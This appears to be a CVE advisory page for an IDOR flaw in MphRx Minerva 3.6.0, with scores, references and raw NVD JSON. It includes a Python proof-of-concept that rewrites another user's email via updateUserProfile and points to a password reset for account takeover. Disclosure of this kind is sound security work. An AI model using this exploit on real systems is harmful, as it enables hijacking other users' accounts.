CVE-2026-5779

Description

An insecure direct object reference (IDOR) vulnerability in MphRx's Minerva V3.6.0, specifically in the '/minerva/user/updateUserProfile' endpoint. This allows an authenticated user to modify the information of other registered users. Successful exploitation of this vulnerability allows an authenticated user to modify other users' information, such as their email address, and request a new password via the '/webconnect/#/forgotPassword' endpoint. This could lead to complete account takeover.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:agilonhealth:minerva:3.6.0:*:*:*:*:*:*:* - VULNERABLE

MphRx Minerva V3.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Configuration target_host = "https://target-minerva-server.com" login_endpoint = "/minerva/login" update_endpoint = "/minerva/user/updateUserProfile" # Attacker credentials username = "attacker_user" password = "attacker_pass" # Victim details victim_user_id = "1002" # The ID of the target user to hijack new_email = "[email protected]" # 1. Authenticate as low-privileged user session = requests.Session() login_payload = {"username": username, "password": password} session.post(target_host + login_endpoint, json=login_payload) # 2. Exploit IDOR to update victim's profile # Vulnerable endpoint assumes the session user owns the victim_user_id update_payload = { "userId": victim_user_id, "email": new_email, "firstName": "Hacked" # Other profile fields may be required } response = session.post(target_host + update_endpoint, json=update_payload) if response.status_code == 200: print(f"[+] Success: Victim profile updated. Email changed to {new_email}") print("[+] Next step: Initiate password reset via /webconnect/#/forgotPassword") else: print(f"[-] Failed. Status: {response.status_code}, Response: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5779
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5779
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5779/
[4] VulDB https://vuldb.com/cve/CVE-2026-5779
[5] https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-mphrxs-minerva

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5779", "sourceIdentifier": "[email protected]", "published": "2026-04-28T13:19:22.420", "lastModified": "2026-05-05T14:20:48.227", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An insecure direct object reference (IDOR) vulnerability in MphRx's Minerva V3.6.0, specifically in the '/minerva/user/updateUserProfile' endpoint. This allows an authenticated user to modify the information of other registered users. Successful exploitation of this vulnerability allows an authenticated user to modify other users' information, such as their email address, and request a new password via the '/webconnect/#/forgotPassword' endpoint. This could lead to complete account takeover."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:agilonhealth:minerva:3.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "14070C6A-CA8D-4B09-B988-D05A648B76F1"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-mphrxs-minerva", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}